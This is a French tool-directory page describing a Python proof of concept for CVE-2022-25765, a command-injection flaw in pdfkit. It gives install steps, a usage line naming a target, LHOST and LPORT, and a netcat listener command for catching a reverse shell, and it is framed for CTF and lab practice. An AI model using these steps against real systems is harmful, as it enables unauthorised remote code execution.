Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2022-25765 — Preuve de concept en Python pour CVE-2022-25765, une vulnérabilité d'injection de commandes dans pdfkit, permettant l'exécution de code à distance via une génération de PDF malveillante. | Kitploit
Outils/GitHubGitHub/innocentx0/cve-2022-25765
Analyse des VulnérabilitésExploitationExploitation d'Applications WebCTFTests d'IntrusionCommandement et ContrôleApprentissage et Éducation
GitHubinnocentx0/cve-2022-25765

CVE-2022-25765

Preuve de concept en Python pour CVE-2022-25765, une vulnérabilité d'injection de commandes dans pdfkit, permettant l'exécution de code à distance via une génération de PDF malveillante.

Voir le dépôt
il y a 16h 56mPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2022-25765 — pdfkit

PoC pour CVE-2022-25765, affectant les versions vulnérables de pdfkit.

Testé avec pdfkit 0.8.6.

Prérequis

  • Python 3.x
  • requests
  • colorama

Installer les dépendances :

root@kitploit:~
pip3 install -r requirements.txt

Ou manuellement :

root@kitploit:~
pip3 install requests colorama

Utilisation

root@kitploit:~
python3 exploit2.py -u <TARGET> -l <LHOST> -p <LPORT>

Exemple : Lancer un listener

root@kitploit:~
nc -lvnp 4242
root@kitploit:~
python3 exploit2.py -u http://10.10.10.10 -l 10.10.14.5 -p 4444

Installation

Cloner le dépôt :

root@kitploit:~
git clone [email protected]:innocentx0/CVE-2022-25765.git
cd CVE-2022-25765

Installer les prérequis :

root@kitploit:~
pip3 install -r requirements.txt

Exécuter le PoC contre votre cible de laboratoire.

Vulnérabilité

CVE-2022-25765 est une vulnérabilité d'injection de commandes dans les versions vulnérables de pdfkit.

Le problème est lié à une désinfection insuffisante des entrées contrôlées par l'utilisateur transmises au processus de génération de PDF.

Remarques

Ce PoC a été créé principalement pour l'apprentissage et les environnements CTF/laboratoire.

Si vous cherchez un endroit pour l'essayer, Hack The Box : Machine : Precious.

Avertissement

Utilisez ceci uniquement contre des systèmes que vous possédez ou pour lesquels vous avez une autorisation explicite de test.

Je ne suis pas responsable des mauvais usages ou des dommages causés par ce projet.


INNOCENTx0

Télécharger l’outil